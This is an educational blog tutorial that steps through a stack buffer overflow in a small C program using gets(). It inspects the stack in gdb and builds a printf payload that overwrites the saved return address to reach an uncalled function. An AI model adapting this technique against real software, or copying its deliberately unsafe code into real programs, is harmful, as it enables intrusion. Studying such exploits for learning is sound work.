
Examining a Buffer Overflow in C and assembly with gdb


I’ve now finished Vivek Ramachandran’s Assembly Primer for Hackers and I’ve decided to move on to his Buffer Overflow Primer. I’ve exploited basic buffer overflows before, but I think going through his videos will give me more perspective now that I’ve brushed up on assembly.

In this article I'll step through the program from Vivek's first video and share some additional tips and tricks I find useful when examining it in gdb. I'm also on a 64-bit machine, so things look a bit different in gdb for me than they do in the video. That's another reason to write up my own explanations as I work through the material: they'll be clearer when I review them later.

Buffer Overflow

Wikipedia describes a buffer overflow as “an anomaly where a program, while writing data to a buffer, overruns the buffer’s boundary and overwrites adjacent memory.” When writing software you define all sorts of buffers where data can be stored. If the boundaries of these buffers are not explicitly checked, the program may continue to write data beyond the end of the buffer. But if data is written beyond the end of a buffer, where does it go? Well, it starts overwriting data in other memory locations; or in some cases it may try to write to memory locations that it doesn’t have access to and the operating system may return an exception to the program or kill it.

How to exploit it

Well, we know that a buffer overflow involves overwriting memory locations outside the buffer. Typically you exploit a buffer overflow in an application by doing exactly this. The difficulty in writing a buffer overflow exploit is in determining which memory locations you are able to overwrite and how overwriting those locations can benefit you. Typically what you’re trying to do is force the application to jump to another location in memory and execute the instructions there instead of the instructions that it would normally execute. For instance, you might be trying to get the program to jump to a root shell. A few ways you might do this are:

  • Overwrite a local variable that affects the workflow of the program by causing it to branch in a way that is beneficial to the attacker.
  • Overwrite the return address on the stack. As soon as the current function executes ret, the return address is popped off the stack into EIP (RIP on x86-64) and execution continues there.
  • Overwrite a function pointer or an exception handler. As soon as the function is called or the exception is thrown your code will execute instead.

The code

This is the C code that I’m compiling and reviewing in gdb.

GetInput.c: the ‘gets’ function is used here so we can observe a buffer overflow

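#include <stdio.h>
#include <stdlib.h>     /* exit() */
void CanNeverExecute()
{
    printf("I can never execute\n");
    exit(0);
}

void GetInput()
{
    char buffer[8];

    gets(buffer);       /* deliberately unsafe: no bounds check; gets was removed in C11 */
    puts(buffer);
}

int main()
{
    GetInput();

    return 0;
}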
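For contrast, here is a minimal sketch of how the gets call could be bounded with the standard fgets function. The helper read_line_bounded is hypothetical and not part of Vivek's program; it takes the stream as a parameter so it can be exercised without a terminal.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical bounded replacement for gets(buffer).
   fgets() stores at most size - 1 characters plus a terminating NUL,
   so it never writes past the end of buf. Input that doesn't fit is
   left in the stream for the next read instead of spilling onto the stack. */
char *read_line_bounded(FILE *in, char *buf, size_t size)
{
    if (size == 0 || size > (size_t)INT_MAX)
        return NULL;                    /* fgets takes an int size */
    if (fgets(buf, (int)size, in) == NULL)
        return NULL;                    /* EOF or read error */
    buf[strcspn(buf, "\n")] = '\0';     /* drop the newline, if one was read */
    return buf;
}
```

Calling read_line_bounded(stdin, buffer, sizeof buffer) in place of gets(buffer) would leave buffer holding "overflo" for the input overflow the buffer; the rest of the line simply stays unread in stdin.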

Compiling the code

On my 64-bit machine I compile the code using -ggdb to enable debugging information. I also use -fno-stack-protector to disable stack protection.

gcc -ggdb -fno-stack-protector -o GetInput GetInput.c

Running the vulnerable program

You'll notice that gets is given an 8-byte buffer (char buffer[8]). Running the program and typing 'overflo' works without a hitch, since those 7 characters plus the terminating null byte exactly fill the buffer.

# ./GetInput
overflo
overflo

But if you start feeding it more characters you’ll almost surely see a segmentation fault. The number of characters you have to type to get a segfault could vary depending on your CPU and your compiler, but something like ‘overflow the buffer’ should do the trick.

# ./GetInput
overflow the buffer
overflow the buffer
Segmentation fault

Exploit type

This particular code is vulnerable to a stack-based buffer overflow. The gets function is unsafe because it reads any number of characters from stdin into the buffer, regardless of the buffer's size. In the run above we typed 19 characters, and gets also appends a null character to mark the end of the string. Twenty bytes obviously don't fit into an 8-byte buffer, so we wrote 12 bytes past the end of it.
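The arithmetic is easy to check in code. This sketch uses a hypothetical helper, bytes_past_end, which assumes gets has already stripped the newline and measures the overflow against the declared 8-byte size (the compiler may reserve more stack space than that).

```c
#include <string.h>

/* Hypothetical helper: how many bytes gets() would write past the end of
   a buffer of declared_size bytes when given input (newline already
   stripped). gets() writes strlen(input) characters plus a NUL terminator. */
size_t bytes_past_end(const char *input, size_t declared_size)
{
    size_t written = strlen(input) + 1;   /* characters + terminating NUL */
    return written > declared_size ? written - declared_size : 0;
}
```

For the two runs above, bytes_past_end("overflo", 8) is 0 and bytes_past_end("overflow the buffer", 8) is 12.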

Because buffer is a local variable of GetInput, it is stored on the stack, which is why this is a stack overflow. To exploit it, we would most likely overwrite the saved return address, which is loaded into EIP (RIP on x86-64) when the function returns.

Analyzing the program in gdb

Digging in

Let’s understand how this overflow actually works and how you could do nasty things with it. To start, load up the program in gdb.

gdb ./GetInput

Setting breakpoints

Since gets is where the overflow happens, I think it's most helpful to set one breakpoint just before the call to GetInput and another just before the call to gets.

(gdb) list
{
    char buffer[8];
    gets(buffer);
    puts(buffer);
}
main() {
    GetInput();
    return 0;
}
(gdb) break 19
Breakpoint 1 at 0x4005f2: file GetInput.c, line 19.
(gdb) break 13
Breakpoint 2 at 0x4005d4: file GetInput.c, line 13.

Running the program

Let’s go ahead and run the program now that we have the breakpoints.

(gdb) run
Starting program: /root/c/GetInput

Breakpoint 1, main () at GetInput.c:19
19      GetInput();

Examining the stack before the call to GetInput

Because this is a stack overflow, it’s important to review the stack before we call GetInput.

The stack before calling GetInput

(gdb) x/8xg $rsp
0x7fffffffe3f0: 0x0000000000000000  0x00007ffff7a78c4d
0x7fffffffe400: 0x0000000000000000  0x00007fffffffe4d8
0x7fffffffe410: 0x0000000100000000  0x00000000004005ee
0x7fffffffe420: 0x0000000000000000  0x27697451f3069404

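At the top of the stack is 0x0 followed by 0x00007ffff7a78c4d. Since main's prologue (push %rbp; mov %rsp,%rbp) has already run, these are main's saved base pointer and its return address into the C library's startup code.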

Examining the stack after the call to GetInput

Now let’s step into the call to GetInput and examine the stack again to see what’s changed.

The stack after calling GetInput

(gdb) s
Breakpoint 2, GetInput () at GetInput.c:13
13      gets(buffer);
(gdb) x/8xg $rsp
0x7fffffffe3d0: 0x0000000000000000  0x00000000004004d0
0x7fffffffe3e0: 0x00007fffffffe3f0  0x00000000004005fc
0x7fffffffe3f0: 0x0000000000000000  0x00007ffff7a78c4d
0x7fffffffe400: 0x0000000000000000  0x00007fffffffe4d8

If we look for the 0x0 followed by 0x00007ffff7a78c4d again, we can see they're still visible on the second-to-last line, but they're now further down the stack. The stack pointer moved from 0x7fffffffe3f0 to 0x7fffffffe3d0, so 32 (0x20) bytes were added to the stack. Based on the code you should have a pretty good idea of why, but let's review it in gdb to be sure.
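The 32 bytes can be accounted for by replaying GetInput's call and prologue on the stack pointer. This sketch models only %rsp and %rbp (struct regs and replay_getinput_prologue are hypothetical names), starting from the 0x7fffffffe3f0 that gdb showed in main and the 16 bytes of locals that GetInput reserves.

```c
#include <stdint.h>

/* The two registers this model tracks (hypothetical, not a real CPU API). */
struct regs {
    uint64_t rsp;
    uint64_t rbp;
};

/* Replays the effect on %rsp/%rbp of:
     callq GetInput      ; pushes the 8-byte return address
     push  %rbp          ; pushes main's base pointer
     mov   %rsp,%rbp     ; new frame base
     sub   $locals,%rsp  ; reserves space for local variables
   starting from main's %rsp just before the call. */
struct regs replay_getinput_prologue(uint64_t rsp_before_call, uint64_t locals)
{
    struct regs r;
    r.rsp = rsp_before_call - 8;  /* callq: return address */
    r.rsp -= 8;                   /* push %rbp */
    r.rbp = r.rsp;                /* mov %rsp,%rbp */
    r.rsp -= locals;              /* sub $0x10,%rsp */
    return r;
}
```

With rsp_before_call = 0x7fffffffe3f0 and locals = 0x10, the model ends at rsp = 0x7fffffffe3d0 and rbp = 0x7fffffffe3e0: 8 bytes for the return address, 8 for the saved base pointer, and 16 for locals.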

What was added to the stack when calling GetInput

The answers are simple, but I’ll explain them in detail so this section is a doozy. Let’s start by looking at our current stack frame (the frame for GetInput).

GetInput’s stack frame

(gdb) info f
Stack level 0, frame at 0x7fffffffe3f0:
 rip = 0x4005d4 in GetInput (GetInput.c:13); saved rip 0x4005fc
 called by frame at 0x7fffffffe400
 source language c.
 Arglist at 0x7fffffffe3e0, args:
 Locals at 0x7fffffffe3e0, Previous frame's sp is 0x7fffffffe3f0
 Saved registers:
  rbp at 0x7fffffffe3e0, rip at 0x7fffffffe3e8

In the output above, note saved rip 0x4005fc. It matches the fourth 8-byte value on the stack (at 0x7fffffffe3e8, which gdb also lists as the rip location under Saved registers). That's because calling GetInput pushed the return address back into main onto the stack. You can confirm this by disassembling main:

Main’s compiler-generated assembly code

(gdb) disas main
Dump of assembler code for function main:
   0x00000000004005ee <+0>:   push   %rbp
   0x00000000004005ef <+1>:   mov    %rsp,%rbp
   0x00000000004005f2 <+4>:   mov    $0x0,%eax
   0x00000000004005f7 <+9>:   callq  0x4005cc <GetInput>
   0x00000000004005fc <+14>:  mov    $0x0,%eax
   0x0000000000400601 <+19>:  leaveq
   0x0000000000400602 <+20>:  retq
End of assembler dump.

Notice that 0x4005fc, the return address saved on the stack, is the address of the instruction right after the call to GetInput. When GetInput executes ret, execution resumes there.
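The return address is just the call instruction's address plus its length. In the listing, callq at 0x4005f7 is followed by the next instruction at 0x4005fc, so it is 5 bytes long, which is consistent with the x86-64 near call encoding (opcode 0xE8 plus a 32-bit displacement). That displacement is measured from the return address, not from the call itself. A small sketch with hypothetical helper names:

```c
#include <stdint.h>

/* Length of a near `call rel32`: one opcode byte (0xE8) plus a 4-byte
   displacement. Matches the dump: callq at 0x4005f7, next insn at 0x4005fc. */
enum { CALL_REL32_LEN = 5 };

/* The address the call pushes: the instruction right after it. */
uint64_t call_return_address(uint64_t call_addr)
{
    return call_addr + CALL_REL32_LEN;
}

/* The encoded displacement is relative to that return address. */
int32_t call_rel32(uint64_t call_addr, uint64_t target)
{
    return (int32_t)((int64_t)target - (int64_t)call_return_address(call_addr));
}
```

For callq 0x4005cc <GetInput> at 0x4005f7, the return address is 0x4005fc and the encoded displacement is -48 (-0x30).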

Now take another look at GetInput's frame info: it reports Previous frame's sp is 0x7fffffffe3f0, and Saved registers shows rbp at 0x7fffffffe3e0. The value 0x7fffffffe3f0 stored at 0x7fffffffe3e0 is main's saved base pointer; it equals main's stack pointer because main never adjusts %rsp after its prologue. It's on the stack because a standard function prologue begins by pushing the caller's base pointer. If you disassemble GetInput you'll see that's exactly what it did.

GetInput’s compiler-generated assembly code

(gdb) disas GetInput
Dump of assembler code for function GetInput:
   0x00000000004005cc <+0>:   push   %rbp
   0x00000000004005cd <+1>:   mov    %rsp,%rbp
   0x00000000004005d0 <+4>:   sub    $0x10,%rsp
=> 0x00000000004005d4 <+8>:   lea    -0x10(%rbp),%rax
   0x00000000004005d8 <+12>:  mov    %rax,%rdi
   0x00000000004005db <+15>:  callq  0x4004c0 <gets@plt>
   0x00000000004005e0 <+20>:  lea    -0x10(%rbp),%rax
   0x00000000004005e4 <+24>:  mov    %rax,%rdi
   0x00000000004005e7 <+27>:  callq  0x400490 <puts@plt>
   0x00000000004005ec <+32>:  leaveq
   0x00000000004005ed <+33>:  retq
End of assembler dump.

As the push %rbp instruction at <+0> shows, GetInput did push the base pointer onto the stack, which is what we saw when examining the stack.

That leaves the other mysterious 16 bytes at the top of the stack. What are those for? The instruction at <+4>, sub $0x10,%rsp, subtracts 0x10 (16 in decimal) from the stack pointer to make room for buffer, the local variable we defined. We only declared an 8-byte buffer, though. The most likely reason for the extra 8 bytes is the x86-64 System V ABI, which requires the stack pointer to be 16-byte aligned at every call instruction, so GCC rounds the space for locals up to a multiple of 16.
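A simplified model of that rounding is sketched below, assuming the only constraint is keeping %rsp 16-byte aligned for the call to gets; GCC's actual frame layout can depend on more than this. In this session %rsp is 0x7fffffffe3f0 before callq GetInput, and after the 8-byte return address and the 8-byte push %rbp it is back on a 16-byte boundary, so the space for locals has to be a multiple of 16 as well. align_up and aligned_for_call are hypothetical helpers.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Round n up to the next multiple of align (align must be a power of two). */
size_t align_up(size_t n, size_t align)
{
    return (n + align - 1) & ~(align - 1);
}

/* True if rsp meets the 16-byte alignment the x86-64 System V ABI
   expects immediately before a call instruction. */
bool aligned_for_call(uint64_t rsp)
{
    return rsp % 16 == 0;
}
```

Under this model align_up(8, 16) gives the 16 bytes seen in sub $0x10,%rsp, and the resulting %rsp of 0x7fffffffe3d0 passes aligned_for_call.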

Why isn’t the buffer 0?

You may also be wondering why the buffer isn't initialized to 0, but instead appears to contain some miscellaneous data.

buffer, the local variable in GetInput

(gdb) x/2xg $rsp
0x7fffffffe3d0: 0x0000000000000000  0x00000000004004d0

Well, the answer is simple: we didn't ask for it to be 0. As the assembly shows, the stack pointer was only adjusted to reserve 16 bytes on the stack; nothing was written to them. We never gave buffer a value, and in C an uninitialized local variable has an indeterminate value. In other words, whatever values happened to be in that memory are still there[1].
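If you do want buffer to start out zeroed, you have to ask for it. A minimal sketch using an initializer, with hypothetical function names; memset(buffer, 0, sizeof buffer) would work just as well.

```c
#include <stdbool.h>
#include <stddef.h>

/* Returns true if every byte of buf is zero. */
bool all_zero(const char *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (buf[i] != 0)
            return false;
    return true;
}

/* Hypothetical variant of GetInput's local: with an initializer, all
   8 bytes are guaranteed to be zero instead of indeterminate. */
bool zeroed_buffer_demo(void)
{
    char buffer[8] = {0};
    return all_zero(buffer, sizeof buffer);
}
```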

No more gdb

Now that we've determined the condition of the stack, I think we know enough to exploit the program. You can go ahead and close gdb; we'll only need it once more, to look up an address.

Visualizing the buffer overflow

Here is basically what our stack looks like in visual form (I based the representation on Aleph One’s):

The program’s stack

lower addresses (top of stack)  higher addresses (bottom of stack)
<------- stack grows this way      gets() writes this way ------->

0x7fffffffe3d0        0x7fffffffe3e0        0x7fffffffe3e8
[ buffer (16 bytes)  ][ saved rbp (8)      ][ return addr (8)    ]
  8 used + 8 padding    0x00007fffffffe3f0    0x00000000004005fc

So when we feed data to gets, the first 16 bytes go into the space reserved for buffer, the next 8 bytes overwrite the saved base pointer, and the next 8 bytes overwrite the saved return address. The best way to exploit this application is to overwrite the return address so that it points somewhere else.

Thinking about the exploit string

We've counted the bytes, so we know we need 16 bytes + 8 bytes to fill the buffer and the saved rbp. Then, to run code, we need an 8-byte memory address that points to the code we want to run. So the string needs to look something like this:

aaaaaaaaaaaaaaaaaaaaaaaaXXXXXXXX
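The 24 filler bytes can also be derived from a model of GetInput's frame. This sketch is a model, not real stack memory: the hypothetical struct getinput_frame mirrors the layout seen in gdb (buffer at rbp-0x10, saved rbp at rbp, return address at rbp+8), and offsetof gives the distance from the start of buffer to the saved return address.

```c
#include <stddef.h>

/* Hypothetical model of GetInput's frame, lowest address first. */
struct getinput_frame {
    unsigned char buffer[16];    /* 8 declared bytes + 8 bytes of padding */
    unsigned char saved_rbp[8];  /* main's base pointer */
    unsigned char ret[8];        /* return address into main */
};

/* All members are byte arrays, so no padding is expected between them. */
_Static_assert(sizeof(struct getinput_frame) == 32, "unexpected padding");

/* Number of filler bytes needed before the 8-byte return address. */
size_t filler_length(void)
{
    return offsetof(struct getinput_frame, ret);
}
```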

The only problem now is filling in the X's with the memory address of some code to execute. Because this is a sample program, it includes a function called CanNeverExecute that never runs under normal circumstances. To demonstrate how a buffer overflow redirects program flow, we'll point the return address at this function. Let's disassemble it in gdb to get its memory location.

CanNeverExecute’s compiler-generated assembly code

(gdb) disas CanNeverExecute
Dump of assembler code for function CanNeverExecute:
   0x00000000004005b4 <+0>:   push   %rbp
   0x00000000004005b5 <+1>:   mov    %rsp,%rbp
   0x00000000004005b8 <+4>:   mov    $0x4006fc,%edi
   0x00000000004005bd <+9>:   callq  0x400490 <puts@plt>
   0x00000000004005c2 <+14>:  mov    $0x0,%edi
   0x00000000004005c7 <+19>:  callq  0x4004a0 <exit@plt>
End of assembler dump.

We can see that the first instruction of CanNeverExecute is at address 0x4005b4, so if we want to execute this function, that's the address we need to provide to gets.

But how do you put a memory address into a string? Typing the hexadecimal digits into the string would simply give us their ASCII characters, so something like this will not work:

aaaaaaaaaaaaaaaaaaaaaaaa4005b4

Placing hexadecimal bytes into a string

There are numerous ways to do this, but the easiest on Linux is the printf command in bash, which works much like printf in C and also understands \xHH escapes for arbitrary byte values.

# printf '\x30\x31\x32\n'
012

This particular example just prints out 0, 1, and 2, but you can use it to produce any byte value, including ones that aren't printable characters. If you don't believe it, try this one:

# printf '\xaa\xab\xac\n'
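C string literals use the same \xHH notation, except that the compiler, rather than a shell builtin, turns each escape into a single byte. This sketch contrasts that with typing the address as text; the array names are only for illustration.

```c
/* "\x30\x31\x32" is three bytes, 0x30 0x31 0x32, i.e. the characters '0', '1', '2'
   (plus the terminating NUL the compiler appends). */
const char escaped[] = "\x30\x31\x32";

/* Typing the address as text gives ASCII digits, not the bytes 0xb4 0x05 0x40:
   '4' is 0x34, '0' is 0x30, 'b' is 0x62, and so on. */
const char as_text[] = "4005b4";
```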

Crafting the exploit string

Now that we can put hex values into a string, we’re ready to create the exploit. If you’re anxious you may have already started typing, thinking it’s one of these:

aaaaaaaaaaaaaaaaaaaaaaaa\x40\x05\xb4

aaaaaaaaaaaaaaaaaaaaaaaa\x00\x00\x00\x00\x00\x40\x05\xb4

But which one is it!? Actually...

They’re both wrong!

Chances are that if you're reading this article you're running on an x86 or x86-64 processor. Those processors are little-endian, which means multi-byte values are stored in memory least significant byte first!

This sounds confusing, but it just means we need to write the address into the string byte-reversed, so that when ret loads those 8 bytes from the stack the CPU reads them as 0x00000000004005b4. So now our exploit string becomes:

aaaaaaaaaaaaaaaaaaaaaaaa\xb4\x05\x40\x00\x00\x00\x00\x00
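The byte reversal is exactly what a little-endian store does, so the exploit string can also be built in C. This is a sketch under the assumptions above (24 filler bytes, target 0x4005b4 from the CanNeverExecute disassembly); store_le64, load_le64, and build_payload are hypothetical helpers. Shifting the value out one byte at a time produces the same byte order regardless of the machine the code runs on.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store value in out[0..7], least significant byte first (little-endian). */
void store_le64(unsigned char out[8], uint64_t value)
{
    for (int i = 0; i < 8; i++)
        out[i] = (unsigned char)(value >> (8 * i));
}

/* Read 8 little-endian bytes back, the way ret interprets them on x86-64. */
uint64_t load_le64(const unsigned char in[8])
{
    uint64_t value = 0;
    for (int i = 7; i >= 0; i--)
        value = (value << 8) | in[i];
    return value;
}

/* Hypothetical payload builder: `filler` bytes of 'a' followed by the
   8-byte little-endian target address. Returns the payload length. */
size_t build_payload(unsigned char *out, size_t filler, uint64_t target)
{
    memset(out, 'a', filler);
    store_le64(out + filler, target);
    return filler + 8;
}
```

Writing the result with fwrite(payload, 1, len, stdout) from a small program and piping it into ./GetInput should have the same effect as the printf one-liner used next.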

OMG I’m an ub3r h4x0r, let’s pwn this program!

Wow, you’re really excited about this, huh? Ok, well let’s try this out and see if the exploit works. We’ll just pipe the output from printf into the GetInput program to see if the return address is overwritten properly.

# printf "aaaaaaaaaaaaaaaaaaaaaaaa\xb4\x05\x40\x00\x00\x00\x00\x00" | ./GetInput
aaaaaaaaaaaaaaaaaaaaaaaa�@
I can never execute

What do you know... the CanNeverExecute function ran as expected and printed "I can never execute". So... the exploit works! I guess you're an ub3r h4x0r now.

Finish Line

Well, you’re ub3r 1337 now, so go forth and prosper! I’m sure you’ll see more buffer overflow articles from me soon, so be on the lookout if you’re looking to learn more.

Source: http://www.techblogistech.com/2011/08/examining-a-buffer-overflow-in-c-and-assembly-with-gdb/
